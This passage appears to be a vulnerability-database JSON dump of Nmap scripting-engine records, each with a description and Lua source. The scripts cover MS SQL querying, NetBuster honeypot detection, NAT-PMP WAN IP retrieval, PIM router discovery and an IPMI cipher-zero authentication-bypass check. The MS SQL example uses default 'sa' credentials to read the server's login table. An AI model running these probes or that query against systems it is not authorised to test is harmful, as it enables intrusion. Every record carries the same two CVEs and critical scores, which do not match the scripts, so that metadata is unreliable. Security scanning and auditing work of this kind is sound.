IPv6Host\n end\n end\n\n tSalida.Nodos = Grantotal\n if #errors > 0 then\n tSalida.Error = table.concat(errors, \"\\n\")\n end\n return true, tSalida\nend\n\n---\n-- The script need to be working with IPv6\n--\n--(To bad can't do it with both at same time )\nfunction prerule ()\n\n if not (nmap.address_family() == \"inet6\") then\n stdnse.verbose1(\"This script is IPv6 only.\")\n return false\n end\n\n -- Because Nmap current limitation of working ONE single IP family we must\n -- be sure to have everything for work the Mapped IPv4 to IPv6\n if IPv4Sub == nil then\n stdnse.verbose1( \"There are no IPv4 addresses to map!\\z\n You must provide it using the %s.IPv4Hosts script-arg.\", SCRIPT_NAME)\n return false\n end\n\n -- Now we need to have based IPv6 Prefix, the most important is the previous\n -- known but we have a last-option too .\n if IPv6User == nil then\n stdnse.verbose1(\"There are no IPv6 subnets to scan!\\z\n You must provide it using the targets-ipv6-subnet script-arg.\")\n return false\n end\n\n return true\nend\n\nfunction action ()\n --Vars for created the final report\n local tOutput = stdnse.output_table()\n local bExito = false\n local tSalida\n\n bExito, tSalida = Prescanning()\n\n -- Now we adapt the exit to tOutput and add the hosts to the target!\n tOutput.warning = tSalida.Error\n\n if bExito then\n --Final report of the Debug Lvl of Prescanning\n stdnse.debug1(\"Successful Mapped IPv4 to IPv6 added to the scan: %d\",\n tSalida.Nodos)\n\n tOutput[\"node count\"] = tSalida.Nodos\n tOutput[\"addresses\"] = tSalida.addrs\n\n if tSalida.Error then\n stdnse.debug1(\"Warnings: %s\", tSalida.Error)\n end\n else\n stdnse.debug1(\"Was unable to add nodes to the scan list due this error: %s\",\n tSalida.Error)\n end\n\n return tOutput\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:31:10", "description": "Runs a query against Microsoft SQL Server (ms-sql). \n\nSQL Server credentials required: Yes (use `ms-sql-brute`, `ms-sql-empty-password` and/or `mssql.username` & `mssql.password`) Run criteria: \n\n * Host script: Will run if the `mssql.instance-all`, `mssql.instance-name`\nor `mssql.instance-port` script arguments are used (see mssql.lua). \n\n * Port script: Will run against any services identified as SQL Servers, but only \nif the `mssql.instance-all`, `mssql.instance-name` and `mssql.instance-port` script arguments are NOT used. \n\nNOTE: Communication with instances via named pipes depends on the `smb` library. To communicate with (and possibly to discover) instances via named pipes, the host must have at least one SMB port (e.g. TCP 445) that was scanned and found to be open. Additionally, named pipe connections may require Windows authentication to connect to the Windows host (via SMB) in addition to the authentication required to connect to the SQL Server instances itself. See the documentation and arguments for the `smb` library for more information. \n\nNOTE: By default, the ms-sql-* scripts may attempt to connect to and communicate with ports that were not included in the port list for the Nmap scan. This can be disabled using the `mssql.scanned-ports-only` script argument.\n\n## Script Arguments \n\n#### mssql.database \n\nDatabase to connect to (default: tempdb)\n\n#### ms-sql-query.query \n\nThe query to run against the server. (default: SELECT @@version version)\n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the [mssql](<../lib/mssql.html#script-args>) library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=sa,ms-sql-query.query=\"SELECT * FROM master..syslogins\" <host>\n \n\n## Script Output \n \n \n | ms-sql-query:\n | [192.168.100.25\\MSSQLSERVER]\n | Query: SELECT @@version version\n | version\n | =======\n | Microsoft SQL Server 2005 - 9.00.3068.00 (Intel X86)\n | \tFeb 26 2008 18:15:01\n | \tCopyright (c) 1988-2005 Microsoft Corporation\n |_ \tExpress Edition on Windows NT 5.2 (Build 3790: Service Pack 2)\n \n\n## Requires \n\n * [mssql](<../lib/mssql.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-04-04T10:11:54", "type": "nmap", "title": "ms-sql-query NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2022-01-03T21:08:52", "id": "NMAP:MS-SQL-QUERY.NSE", "href": "https://nmap.org/nsedoc/scripts/ms-sql-query.html", "sourceData": "local mssql = require \"mssql\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\n-- -*- mode: lua -*-\n-- vim: set filetype=lua :\n\ndescription = [[\nRuns a query against Microsoft SQL Server (ms-sql).\n\nSQL Server credentials required: Yes (use <code>ms-sql-brute</code>, <code>ms-sql-empty-password</code>\nand/or <code>mssql.username</code> & <code>mssql.password</code>)\nRun criteria:\n* Host script: Will run if the <code>mssql.instance-all</code>, <code>mssql.instance-name</code>\nor <code>mssql.instance-port</code> script arguments are used (see mssql.lua).\n* Port script: Will run against any services identified as SQL Servers, but only\nif the <code>mssql.instance-all</code>, <code>mssql.instance-name</code>\nand <code>mssql.instance-port</code> script arguments are NOT used.\n\nNOTE: Communication with instances via named pipes depends on the <code>smb</code>\nlibrary. To communicate with (and possibly to discover) instances via named pipes,\nthe host must have at least one SMB port (e.g. TCP 445) that was scanned and\nfound to be open. Additionally, named pipe connections may require Windows\nauthentication to connect to the Windows host (via SMB) in addition to the\nauthentication required to connect to the SQL Server instances itself. See the\ndocumentation and arguments for the <code>smb</code> library for more information.\n\nNOTE: By default, the ms-sql-* scripts may attempt to connect to and communicate\nwith ports that were not included in the port list for the Nmap scan. This can\nbe disabled using the <code>mssql.scanned-ports-only</code> script argument.\n]]\n\n---\n-- @usage\n-- nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=sa,ms-sql-query.query=\"SELECT * FROM master..syslogins\" <host>\n--\n-- @args ms-sql-query.query The query to run against the server.\n-- (default: SELECT @@version version)\n-- @args mssql.database Database to connect to (default: tempdb)\n--\n-- @output\n-- | ms-sql-query:\n-- | [192.168.100.25\\MSSQLSERVER]\n-- | Query: SELECT @@version version\n-- | version\n-- | =======\n-- | Microsoft SQL Server 2005 - 9.00.3068.00 (Intel X86)\n-- | \tFeb 26 2008 18:15:01\n-- | \tCopyright (c) 1988-2005 Microsoft Corporation\n-- |_ \tExpress Edition on Windows NT 5.2 (Build 3790: Service Pack 2)\n--\n\n-- Created 01/17/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n-- Revised 02/01/2011 - v0.2 - Added ability to run against all instances on a host;\n-- added compatibility with changes in mssql.lua (Chris Woodbury)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\ndependencies = {\"broadcast-ms-sql-discover\", \"ms-sql-brute\", \"ms-sql-empty-password\"}\n\n---\nlocal function process_instance( instance )\n local status, result\n -- the tempdb should be a safe guess, anyway the library is set up\n -- to continue even if the DB is not accessible to the user\n -- TODO: consider renaming this arg to ms-sql-query.database\n local database = stdnse.get_script_args( 'mssql.database' ) or \"tempdb\"\n local query = stdnse.get_script_args( {'ms-sql-query.query', 'mssql-query.query' } ) or \"SELECT @@version version\"\n local helper = mssql.Helper:new()\n\n status, result = helper:ConnectEx( instance )\n\n if status then\n status, result = helper:LoginEx( instance, database )\n if ( not(status) ) then result = \"ERROR: \" .. result end\n end\n if status then\n status, result = helper:Query( query )\n if ( not(status) ) then result = \"ERROR: \" .. result end\n end\n\n helper:Disconnect()\n\n if status then\n result = mssql.Util.FormatOutputTable( result, true )\n result[\"name\"] = string.format( \"Query: %s\", query )\n end\n\n return result\nend\n\nlocal do_action\ndo_action, portrule, hostrule = mssql.Helper.InitScript(process_instance)\n\naction = function(...)\n local scriptOutput = do_action(...)\n\n if ( not( stdnse.get_script_args( {'ms-sql-query.query', 'mssql-query.query' } ) ) ) then\n table.insert(scriptOutput, 1, \"(Use --script-args=ms-sql-query.query='<QUERY>' to change query.)\")\n end\n\n return stdnse.format_output( true, scriptOutput )\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:40:18", "description": "Extends version detection to detect NetBuster, a honeypot service that mimes NetBus.\n\n## Example Usage \n \n \n nmap -sV -p 12345 --script netbus-version <target>\n \n\n## Script Output \n \n \n 12345/tcp open netbus Netbuster (honeypot)\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-12-13T18:00:02", "type": "nmap", "title": "netbus-version NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:NETBUS-VERSION.NSE", "href": "https://nmap.org/nsedoc/scripts/netbus-version.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nExtends version detection to detect NetBuster, a honeypot service\nthat mimes NetBus.\n]]\n\n---\n-- @usage\n-- nmap -sV -p 12345 --script netbus-version <target>\n--\n-- @output\n-- 12345/tcp open netbus Netbuster (honeypot)\n\nauthor = \"Toni Ruottu\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"version\"}\n\n\nportrule = shortport.version_port_or_service ({}, \"netbus\", {\"tcp\"})\n\naction = function( host, port )\n\n local socket = nmap.new_socket()\n socket:set_timeout(5000)\n local status, err = socket:connect(host, port)\n if not status then\n return\n end\n local buffer, _ = stdnse.make_buffer(socket, \"\\r\")\n _ = buffer()\n if not (_ and _:match(\"^NetBus\")) then\n stdnse.debug1(\"Not NetBus\")\n return nil\n end\n socket:send(\"Password;0;\\r\")\n\n --NetBus answers to auth\n if buffer() ~= nil then\n return\n end\n\n --NetBuster does not\n port.version.name = \"netbus\"\n port.version.product = \"NetBuster\"\n port.version.extrainfo = \"honeypot\"\n port.version.version = nil\n nmap.set_port_version(host, port)\n return\nend\n\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:41:46", "description": "Gets the routers WAN IP using the NAT Port Mapping Protocol (NAT-PMP). The NAT-PMP protocol is supported by a broad range of routers including: \n\n * Apple AirPort Express \n * Apple AirPort Extreme \n * Apple Time Capsule \n * DD-WRT \n * OpenWrt v8.09 or higher, with MiniUPnP daemon \n * pfSense v2.0 \n * Tarifa (firmware) (Linksys WRT54G/GL/GS) \n * Tomato Firmware v1.24 or higher. (Linksys WRT54G/GL/GS and many more) \n * Peplink Balance\n\n### See also:\n\n * [ nat-pmp-mapport.nse ](<../scripts/nat-pmp-mapport.html>)\n\n## Example Usage \n \n \n nmap -sU -p 5351 --script=nat-pmp-info <target>\n\n## Script Output \n \n \n | nat-pmp-info:\n |_ WAN IP: 192.0.2.13\n\n## Requires \n\n * [natpmp](<../lib/natpmp.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-09-28T19:43:06", "type": "nmap", "title": "nat-pmp-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-08-03T22:05:18", "id": "NMAP:NAT-PMP-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/nat-pmp-info.html", "sourceData": "local natpmp = require \"natpmp\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\n\ndescription = [[\nGets the routers WAN IP using the NAT Port Mapping Protocol (NAT-PMP).\nThe NAT-PMP protocol is supported by a broad range of routers including:\n* Apple AirPort Express\n* Apple AirPort Extreme\n* Apple Time Capsule\n* DD-WRT\n* OpenWrt v8.09 or higher, with MiniUPnP daemon\n* pfSense v2.0\n* Tarifa (firmware) (Linksys WRT54G/GL/GS)\n* Tomato Firmware v1.24 or higher. (Linksys WRT54G/GL/GS and many more)\n* Peplink Balance\n]]\n\n---\n--@usage\n-- nmap -sU -p 5351 --script=nat-pmp-info <target>\n-- @output\n-- | nat-pmp-info:\n-- |_ WAN IP: 192.0.2.13\n-- @xmloutput\n-- <elem key=\"WAN IP\">192.0.2.13</elem>\n-- @see nat-pmp-mapport.nse\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\n\n\nportrule = shortport.port_or_service(5351, \"nat-pmp\", {\"udp\"} )\n\naction = function(host, port)\n local helper = natpmp.Helper:new(host, port)\n local status, response = helper:getWANIP()\n\n if ( status ) then\n nmap.set_port_state(host, port, \"open\")\n port.version.name = \"nat-pmp\"\n nmap.set_port_version(host, port)\n\n return {[\"WAN IP\"] = response.ip}\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:53", "description": "Discovers routers that are running PIM (Protocol Independent Multicast). \n\nThis works by sending a PIM Hello message to the PIM multicast address 224.0.0.13 and listening for Hello messages from other routers.\n\n## Script Arguments \n\n#### broadcast-pim-discovery.timeout \n\nTime to wait for responses in seconds. Defaults to `5s`.\n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script broadcast-pim-discovery\n \n nmap --script broadcast-pim-discovery -e eth1\n --script-args 'broadcast-pim-discovery.timeout=10'\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-pim-discovery:\n | 172.16.0.12\n | 172.16.0.31\n | 172.16.0.44\n |_ Use the newtargets script-arg to add the results as targets\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [packet](<../lib/packet.html>)\n * [ipOps](<../lib/ipOps.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [target](<../lib/target.html>)\n * [table](<>)\n * [math](<>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-08-15T10:24:31", "type": "nmap", "title": "broadcast-pim-discovery NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-08T17:07:00", "id": "NMAP:BROADCAST-PIM-DISCOVERY.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-pim-discovery.html", "sourceData": "local nmap = require \"nmap\"\nlocal packet = require \"packet\"\nlocal ipOps = require \"ipOps\"\nlocal stdnse = require \"stdnse\"\nlocal target = require \"target\"\nlocal table = require \"table\"\nlocal math = require \"math\"\nlocal string = require \"string\"\n\ndescription = [[\nDiscovers routers that are running PIM (Protocol Independent Multicast).\n\nThis works by sending a PIM Hello message to the PIM multicast address\n224.0.0.13 and listening for Hello messages from other routers.\n]]\n\n---\n-- @args broadcast-pim-discovery.timeout Time to wait for responses in seconds.\n-- Defaults to <code>5s</code>.\n--\n--@usage\n-- nmap --script broadcast-pim-discovery\n--\n-- nmap --script broadcast-pim-discovery -e eth1\n-- --script-args 'broadcast-pim-discovery.timeout=10'\n--\n--@output\n-- Pre-scan script results:\n-- | broadcast-pim-discovery:\n-- | 172.16.0.12\n-- | 172.16.0.31\n-- | 172.16.0.44\n-- |_ Use the newtargets script-arg to add the results as targets\n\n\nauthor = \"Hani Benhabiles\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"safe\", \"broadcast\"}\n\nprerule = function()\n if nmap.address_family() ~= 'inet' then\n stdnse.verbose1(\"is IPv4 only.\")\n return false\n end\n if not nmap.is_privileged() then\n stdnse.verbose1(\"not running for lack of privileges.\")\n return false\n end\n return true\nend\n\n-- Generates a raw PIM Hello message.\n--@return hello Raw PIM Hello message\nlocal helloRaw = function()\n local hello_raw = string.pack(\">BB I2\",\n 0x20, -- Version: 2, Type: Hello (0)\n 0x00, -- Reserved\n 0x0000) -- Checksum: Calculated later\n -- Options (TLVs)\n .. string.pack(\">I2I2 I2\", 0x01, 0x02, 0x01) -- Hold time 1 second\n .. string.pack(\">I2I2 I4\", 0x14, 0x04, math.random(23456)) -- Generation ID: Random\n .. string.pack(\">I2I2 I4\", 0x13, 0x04, 0x01) -- DR Priority: 1\n .. string.pack(\">I2I2 BBI2\", 0x15, 0x04, 0x01, 0x00, 0x00) -- State fresh capable: Version = 1, interval = 0, Reserved\n -- Calculate checksum\n hello_raw = hello_raw:sub(1,2) .. string.pack(\">I2\", packet.in_cksum(hello_raw)) .. hello_raw:sub(5)\n\n return hello_raw\nend\n\n-- Sends a PIM Hello message.\n--@param interface Network interface to use.\n--@param dstip Destination IP to which send the Hello.\nlocal helloQuery = function(interface, dstip)\n local hello_packet, sock, eth_hdr\n local srcip = interface.address\n\n local hello_raw = helloRaw()\n local ip_raw = stdnse.fromhex( \"45c00040ed780000016718bc0a00c8750a00c86b\") .. hello_raw\n hello_packet = packet.Packet:new(ip_raw, ip_raw:len())\n hello_packet:ip_set_bin_src(ipOps.ip_to_str(srcip))\n hello_packet:ip_set_bin_dst(ipOps.ip_to_str(dstip))\n hello_packet:ip_set_len(ip_raw:len()) hello_packet:ip_count_checksum()\n\n sock = nmap.new_dnet()\n sock:ethernet_open(interface.device)\n -- Ethernet multicast for PIM, our ethernet address and packet type IP\n eth_hdr = \"\\x01\\x00\\x5e\\x00\\x00\\x0d\" .. interface.mac .. \"\\x08\\x00\"\n sock:ethernet_send(eth_hdr .. hello_packet.buf)\n sock:ethernet_close()\nend\n\n-- Listens for PIM Hello messages.\n--@param interface Network interface to listen on.\n--@param timeout Time to listen for a response.\n--@param responses table to insert responders' IPs into.\nlocal helloListen = function(interface, timeout, responses)\n local condvar = nmap.condvar(responses)\n local start = nmap.clock_ms()\n local listener = nmap.new_socket()\n local p, hello_raw, status, l3data, _\n\n -- PIM packets that are sent to 224.0.0.13 and not coming from our host\n local filter = 'ip proto 103 and dst host 224.0.0.13 and src host not ' .. interface.address\n listener:set_timeout(100)\n listener:pcap_open(interface.device, 1024, true, filter)\n\n while (nmap.clock_ms() - start) < timeout do\n status, _, _, l3data = listener:pcap_receive()\n if status then\n p = packet.Packet:new(l3data, #l3data)\n hello_raw = string.sub(l3data, p.ip_hl*4 + 1)\n -- Check that PIM Type is Hello\n if p and hello_raw:byte(1) == 0x20 then\n table.insert(responses, p.ip_src)\n end\n end\n end\n condvar(\"signal\")\nend\n\n--- Returns the network interface used to send packets to the destination host.\n--@param destination host to which the interface is used.\n--@return interface Network interface used for destination host.\nlocal getInterface = function(destination)\n -- First, create dummy UDP connection to get interface\n local sock = nmap.new_socket()\n local status, err = sock:connect(destination, \"12345\", \"udp\")\n if not status then\n stdnse.verbose1(\"%s\", err)\n return\n end\n local status, address, _, _, _ = sock:get_info()\n if not status then\n stdnse.verbose1(\"%s\", err)\n return\n end\n for _, interface in pairs(nmap.list_interfaces()) do\n if interface.address == address then\n return interface\n end\n end\nend\n\naction = function()\n local timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. \".timeout\"))\n local responses = {}\n timeout = (timeout or 5) * 1000\n local mcast = \"224.0.0.13\"\n\n -- Get the network interface to use\n local interface = nmap.get_interface()\n if interface then\n interface = nmap.get_interface_info(interface)\n else\n interface = getInterface(mcast)\n end\n if not interface then\n return stdnse.format_output(false, (\"Couldn't get interface for %s\"):format(mcast))\n end\n\n stdnse.debug1(\"will send via %s interface.\", interface.shortname)\n\n -- Launch listener\n stdnse.new_thread(helloListen, interface, timeout, responses)\n\n -- Send Hello after small sleep so the listener doesn't miss any responses\n stdnse.sleep(0.1)\n helloQuery(interface, mcast)\n local condvar = nmap.condvar(responses)\n condvar(\"wait\")\n\n if #responses > 0 then\n table.sort(responses)\n if target.ALLOW_NEW_TARGETS then\n for _, response in pairs(responses) do\n target.add(response)\n end\n else\n table.insert(responses,\"Use the newtargets script-arg to add the results as targets\")\n end\n return stdnse.format_output(true, responses)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:33", "description": "IPMI 2.0 Cipher Zero Authentication Bypass Scanner. This module identifies IPMI 2.0 compatible systems that are vulnerable to an authentication bypass vulnerability through the use of cipher zero.\n\n## Script Arguments \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the [vulns](<../lib/vulns.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sU --script ipmi-cipher-zero -p 623 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 623/udp open|filtered unknown no-response\n | ipmi-cipher-zero:\n | VULNERABLE:\n | IPMI 2.0 RAKP Cipher Zero Authentication Bypass\n | State: VULNERABLE\n | Risk factor: High\n | Description:\n |\n | The issue is due to the vendor shipping their devices with the\n | cipher suite '0' (aka 'cipher zero') enabled. This allows a\n | remote attacker to authenticate to the IPMI interface using\n | an arbitrary password. The only information required is a valid\n | account, but most vendors ship with a default 'admin' account.\n | This would allow an attacker to have full control over the IPMI\n | functionality.\n |\n | References:\n | http://fish2.com/ipmi/cipherzero.html\n |_ https://www.us-cert.gov/ncas/alerts/TA13-207A\n \n\n## Requires \n\n * [ipmi](<../lib/ipmi.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [vulns](<../lib/vulns.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-09-08T17:30:40", "type": "nmap", "title": "ipmi-cipher-zero NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-04-02T16:51:36", "id": "NMAP:IPMI-CIPHER-ZERO.NSE", "href": "https://nmap.org/nsedoc/scripts/ipmi-cipher-zero.html", "sourceData": "local ipmi = require \"ipmi\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\n IPMI 2.0 Cipher Zero Authentication Bypass Scanner. This module identifies IPMI 2.0\n compatible systems that are vulnerable to an authentication bypass vulnerability\n through the use of cipher zero.\n]]\n\n---\n-- @usage\n-- nmap -sU --script ipmi-cipher-zero -p 623 <host>\n--\n-- @output\n---PORT STATE SERVICE REASON\n-- 623/udp open|filtered unknown no-response\n-- | ipmi-cipher-zero:\n-- | VULNERABLE:\n-- | IPMI 2.0 RAKP Cipher Zero Authentication Bypass\n-- | State: VULNERABLE\n-- | Risk factor: High\n-- | Description:\n-- |\n-- | The issue is due to the vendor shipping their devices with the\n-- | cipher suite '0' (aka 'cipher zero') enabled. This allows a\n-- | remote attacker to authenticate to the IPMI interface using\n-- | an arbitrary password. The only information required is a valid\n-- | account, but most vendors ship with a default 'admin' account.\n-- | This would allow an attacker to have full control over the IPMI\n-- | functionality.\n-- |\n-- | References:\n-- | http://fish2.com/ipmi/cipherzero.html\n-- |_ https://www.us-cert.gov/ncas/alerts/TA13-207A\n--\n\nauthor = \"Claudiu Perta <claudiu.perta@gmail.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\nportrule = shortport.port_or_service(623, \"asf-rmcp\", \"udp\", {\"open\", \"open|filtered\"})\n\naction = function(host, port)\n\n local vuln_table = {\n title = \"IPMI 2.0 RAKP Cipher Zero Authentication Bypass\",\n state = vulns.STATE.NOT_VULN,\n risk_factor = \"High\",\n description = [[\n\nThe issue is due to the vendor shipping their devices with the\ncipher suite '0' (aka 'cipher zero') enabled. This allows a\nremote attacker to authenticate to the IPMI interface using\nan arbitrary password. The only information required is a valid\naccount, but most vendors ship with a default 'admin' account.\nThis would allow an attacker to have full control over the IPMI\nfunctionality\n ]],\n references = {\n 'http://fish2.com/ipmi/cipherzero.html',\n 'https://www.us-cert.gov/ncas/alerts/TA13-207A',\n }\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n\n local request = ipmi.session_open_cipher_zero_request()\n\n local socket = nmap.new_socket()\n socket:set_timeout(\n ((host.times and host.times.timeout) or 8) * 1000)\n socket:connect(host, port, \"udp\")\n\n -- Send 3 probes\n local tries = 3\n repeat\n socket:send(request)\n tries = tries - 1\n until tries == 0\n\n local status, reply = socket:receive()\n socket:close()\n\n if not status then\n stdnse.debug1(string.format(\"No response (%s)\", reply))\n return nil\n end\n\n nmap.set_port_state(host, port, \"open\")\n\n local info = ipmi.parse_open_session_reply(reply)\n if info[\"session_payload_type\"] == ipmi.PAYLOADS[\"RMCPPLUSOPEN_REP\"] and info[\"error_code\"] == 0 then\n vuln_table.state = vulns.STATE.VULN\n end\n\n return report:make_output(vuln_table)\n\nend\n", "cvss": {"score": 10.0, "vector": 